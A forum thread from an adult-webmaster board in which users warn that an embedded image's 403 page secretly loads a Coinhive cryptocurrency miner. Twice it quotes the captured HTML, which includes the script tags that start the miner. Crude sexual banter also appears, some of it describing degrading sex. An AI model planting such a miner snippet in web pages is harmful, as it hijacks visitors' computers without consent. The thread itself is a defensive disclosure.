Stay Out Of The Homeless Porn Thread

[sarettah]

There is an image link in several posts that will try to push a coin mining script on you.

The image url in question points at xxgasm dot com. It goes 403 or 404 and tries to push the script on you.

I don't think the person who posted it meant to do it. I think they were just trying to link to an image. Not sure about that part, just a guess.

You have been warned.

Admin has been notified.

Back to our normal broadcasting.

.

[sarettah]

I just realized that my Norton is blocking the attack so I do NOT really know that status of the page coming back.

I am not seeing any image so I assumed the url was 404 but I am probably not seeing anything because antivirus is blocking it.

On my phone the image url in question goes 404. I do NOT know if the script gets loaded there or not.

.

[Bladewire]

This is what I see

[sarettah]

It doesn't matter what you see.

The link to the xxgasm image is throwing an attack on my computer.

I have no idea about anybody else's computer.

That particular image url is triggering 2 attacks in a row for 2 different versions of a coinmining script.

Look at the attacker url below. That is the image that you embedded from the xxgasm site. It is not coming from my computer. I assume other people are either getting it blocked or it is infecting them. I don't know for sure about anybody but me.





.

[shake]

Thanks for the heads up. If I'm going to mine coins, I'd rather do it for myself

[Bladewire]

Yeah it looks like xxgasm.com is riddled with viruses. Sorry but no warnings came up posting that image from my phone. I think your Norton is blocking you from anything from that domain, not that the image itself delivers a virus or coining script

[sarettah]

Dude.

The attacking URL is where the attack came from.

The blocking went into affect in response to the attack. Norton then puts that ip address on time out for 30 minutes.

The image URL you posted is where the attack originated from.

The images I posted show what happened. Norton blocked the coinmining scripts from being loaded. The url trying to load them is the image url you posted. There are 2 different scripts the site is trying to download.

It is quite simple. Norton is NOT blocking anything from xxgasm until the attack occurs.

READ the images I put up there.


.

[Bladewire]

You are trippin

Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script.

Anyway, it's good people know to stay away 👍 Thank you 🤗

[2MuchMark]

Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.

[sarettah]

Quote:

Originally Posted by Bladewire

You are trippin

Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script.

Anyway, it's good people know to stay away �� Thank you ��

Dude. I have been tracking down viruses and malware for about 30 years now.

You are the one doing the tripping.

I hit the image url with a curl call using a referal of gfy.com and the following code comes back.

The page returns a 403 and then attempts to load a script through a custom 403 page.

Code:

HTTP/1.1 403 Forbidden  
Server: nginx  
Date: Fri, 29 Dec 2017 13:33:30 GMT  
Content-Type: text/html  
Content-Length: 378  
Connection: keep-alive  ETag: "5a09c6d9-17a"    
<html>
<head>
<title>403 Forbidden</title>
</head> 
<body bgcolor="white"> 
<center>
<h1>403 Forbidden</h1>
</center> 
<hr>
<center>nginx</center> 
<script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script> 
<script> 	
var miner = new CoinHive.Anonymous(''); 
miner.start(); 
</script> 
<script src="http://www.google.com:81/"></script> 
</body> </html>

.

[Bladewire]

Quote:

Originally Posted by 2MuchMark

Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.

How is giving fiscal opportunities to the homeless, along with an orgasm, an "ugly" thing?

[Bladewire]

Quote:

Originally Posted by sarettah

Dude. I have been tracking down viruses and malware for about 30 years now.

You are the one doing the tripping.

I hit the image url with a curl call using a referal of gfy.com and the following code comes back.

The page returns a 403 and then attempts to load a script through a custom 403 page.

Code:

HTTP/1.1 403 Forbidden  
Server: nginx  
Date: Fri, 29 Dec 2017 13:33:30 GMT  
Content-Type: text/html  
Content-Length: 378  
Connection: keep-alive  ETag: "5a09c6d9-17a"    
<html>
<head>
<title>403 Forbidden</title>
</head> 
<body bgcolor="white"> 
<center>
<h1>403 Forbidden</h1>
</center> 
<hr>
<center>nginx</center> 
<script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script> 
<script> 	
var miner = new CoinHive.Anonymous(''); 
miner.start(); 
</script> 
<script src="http://www.google.com:81/"></script> 
</body> </html>

.

I'll take your word for it as I'm accessing from my phone but... still... you're trippin 😛🤗

[Grapesoda]

Quote:

Originally Posted by 2MuchMark

Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.

really? I dont see that any worse than holding a girls head on the ground with the foot, while fucking her and spitting and peeing on her.. which gets RAVE reviews here at GFY...

btw I love the public shame you're trying to dump on me, tarnish my persona a bit maybe? a little passive aggressive lesson on 'not obeying your commands to think like you do?'

boy that will teach me

[Grapesoda]

Quote:

Originally Posted by sarettah

Dude.

The attacking URL is where the attack came from.

The blocking went into affect in response to the attack. Norton then puts that ip address on time out for 30 minutes.

The image URL you posted is where the attack originated from.

The images I posted show what happened. Norton blocked the coinmining scripts from being loaded. The url trying to load them is the image url you posted. There are 2 different scripts the site is trying to download.

It is quite simple. Norton is NOT blocking anything from xxgasm until the attack occurs.

READ the images I put up there.


.

thanks for the catch, what process would I see if I had been infected?

[Grapesoda]

Quote:

Originally Posted by Bladewire

How is giving fiscal opportunities to the homeless, along with an orgasm, an "ugly" thing?

a least we can agree on financial opportunities

[Bladewire]

Quote:

Originally Posted by Grapesoda

a least we can agree on financial opportunities

Here's a great article on what to look for

https://qz.com/1085171/how-to-tell-i...o-do-about-it/

"Researchers at IBM have found a more sophisticated class of surreptitious mining software that penetrates your system. These are delivered through infected image files or by clicking on links leading to a malicious site. Such attacks tend to target enterprise networks, IBM found, so get in touch with your IT person for help.

If your system is infected, you should detect a degradation in performance, in which case fire up Activity Monitor or Task Manager to check your CPU usage. You can then identify the process that?s eating up all those compute cycles and terminate it from your resource monitor, says Dave McMillen of IBM Managed Security Services, who authored the research on secret crypto miners."

[sarettah]

Quote:

Originally Posted by Grapesoda

thanks for the catch, what process would I see if I had been infected?

I am not sure where you would see it right off hand.

I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so. So, it might not be as malicious in intent. But I have a problem with anything running on my system without my permission.

If someone wants to mine coins instead of run advertising they should announce that instead of just loading it up.


.

[Bladewire]

Quote:

Originally Posted by sarettah

I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so.



.

You are trippin

[Speigelau]

I see the attack also, looks like a crypto miner is making a killing off all of Bladewires posting.

[Grapesoda]

Quote:

Originally Posted by sarettah

I am not sure where you would see it right off hand.

I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so. So, it might not be as malicious in intent. But I have a problem with anything running on my system without my permission.

If someone wants to mine coins instead of run advertising they should announce that instead of just loading it up.


.

I didn't open the page, I'm pretty cautious and do run protection. I was curious

[StinkyPink]

Quote:

Originally Posted by Grapesoda

really? I dont see that any worse than holding a girls head on the ground with the foot, while fucking her and spitting and peeing on her.. which gets RAVE reviews here at GFY...

it's funny. I did exactly this to a mennonite woman I dated a few months back... well, minus the peeing part because I don't sleep in piss.

[~Ray]

Bump for knowledge

Ray
Hardlinks.org

[Bladewire]

^^^ This

[JFK]

Quote:

Originally Posted by ~Ray

Bump for knowledge

Ray
Hardlinks.org

bump, for bump's sake !